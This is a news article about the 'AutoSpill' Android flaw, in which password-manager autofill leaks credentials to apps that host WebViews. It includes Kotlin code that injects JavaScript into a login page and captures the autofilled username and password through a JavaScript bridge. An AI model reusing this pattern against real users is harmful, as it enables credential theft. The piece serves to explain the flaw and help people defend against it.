A new security vulnerability has been discovered on Android. It concerns password manager applications, which turn out to be a little too talkative with your personal data.
Whether on phone, computer or tablet, password managers have all built in an autofill feature, which saves users from typing their login credentials every time they sign in to a site or app. But according to recent findings, it also lets a malicious application steal those credentials.
“AutoSpill”, a new attack vector
At the Black Hat Europe conference, three researchers from IIITH (IIIT Hyderabad, a large institute in Telangana, India) demonstrated a flaw dubbed “AutoSpill”, which lets a malicious Android application steal your passwords without you noticing. Concretely, an application that displays a web page inside itself (through the WebView component) can access the data the password manager fills in on that page.
As the researchers explained to TechCrunch, when an application opens a WebView and the password manager fills credentials into it, “ideally these should only be accessible via the web page displayed on the screen”. Unfortunately, the “autofill operation may accidentally expose credentials to the base application”.
Take Spotify, for example: if you use your password manager to sign in to the service through your Facebook account, your data does not stay between you and Facebook's servers but could be read by the Spotify app itself. With a legitimate application this matters little, since no malicious code is present to intercept your information, but it is far more worrying with a compromised app.
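To make the boundary concrete, here is an added illustration in Kotlin (not the researchers' code, nor any real app's) of the pattern the article describes: a host app embeds a third-party login page in a WebView, and because the host owns that WebView it can read whatever the password manager autofills into the form. The research's point is that the autofill framework can expose the values to the host app; the injected script below is simply the plainest way for a host app to demonstrate that it holds them. The package name, the login URL and the form selectors are placeholders, and the second function shows the safer shape for third-party sign-in.

```kotlin
package com.example.autospilldemo // hypothetical package name for this illustration

import android.content.Intent
import android.net.Uri
import android.os.Bundle
import android.util.Log
import android.webkit.JavascriptInterface
import android.webkit.WebView
import android.webkit.WebViewClient
import androidx.appcompat.app.AppCompatActivity

private const val TAG = "AutoSpillDemo"

// Hypothetical third-party login page (stands in for the Facebook login the article mentions).
private const val LOGIN_URL = "https://login.example.com/oauth/authorize"

class LoginActivity : AppCompatActivity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        // Flip this to compare the two behaviours.
        val useEmbeddedWebView = true
        if (useEmbeddedWebView) loginInsideWebView() else loginInSystemBrowser()
    }

    // The exposure: the host app owns the WebView, so everything the password
    // manager autofills into the page is reachable from the host process.
    private fun loginInsideWebView() {
        val webView = WebView(this)
        setContentView(webView)
        webView.settings.javaScriptEnabled = true
        // Expose a Kotlin object to page scripts as window.host
        webView.addJavascriptInterface(HostBridge(), "host")
        webView.webViewClient = object : WebViewClient() {
            override fun onPageFinished(view: WebView, url: String) {
                // Hook the login form so the values are read at submit time,
                // i.e. after the manager has filled them in.
                view.evaluateJavascript(
                    """
                    (function () {
                      var form = document.querySelector('form');
                      if (!form) return;
                      form.addEventListener('submit', function () {
                        var u = form.querySelector('input[type=email], input[type=text]');
                        var p = form.querySelector('input[type=password]');
                        host.onSubmit(u ? u.value : '', p ? p.value : '');
                      });
                    })();
                    """.trimIndent(),
                    null
                )
            }
        }
        webView.loadUrl(LOGIN_URL)
    }

    private class HostBridge {
        // Called from page JavaScript. A legitimate app has no reason to do this;
        // a tampered one would forward the values elsewhere.
        @JavascriptInterface
        fun onSubmit(user: String, pass: String) {
            Log.d(TAG, "host process received credentials for user=$user (password length ${pass.length})")
        }
    }

    // The safer shape for third-party sign-in: hand the URL to the system browser
    // (or a Chrome Custom Tab). The login page then renders in another process,
    // and the host app only gets back what the redirect carries.
    private fun loginInSystemBrowser() {
        startActivity(Intent(Intent.ACTION_VIEW, Uri.parse(LOGIN_URL)))
    }
}
```

The contrast is the whole lesson: in the first path the host process sits between you and the identity provider and sees the filled-in form; in the second it never has the page's DOM at all. When auditing an app, a login screen that is really an embedded WebView, especially one with JavaScript enabled and a `addJavascriptInterface` bridge, is the shape to look for.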
Be careful about the apps you download
A modified version of Spotify could thus steal your Facebook credentials while looking entirely legitimate, since your credentials would apparently never be requested by the app itself but by the real Facebook servers. “Even without phishing, any malicious app that asks you to log in through another site, like Google or Facebook, can automatically access sensitive information”, summarizes one of the researchers.
The problem seems to affect almost every major password manager, from 1Password to LastPass, Keeper and EnPass. Warning messages have already been added to some of these applications, but since the problem lies on the OS side, we will have to wait for Google to fix the bug directly. In the meantime, be very careful about which apps you download and who you hand your login information to.
Source: TechCrunch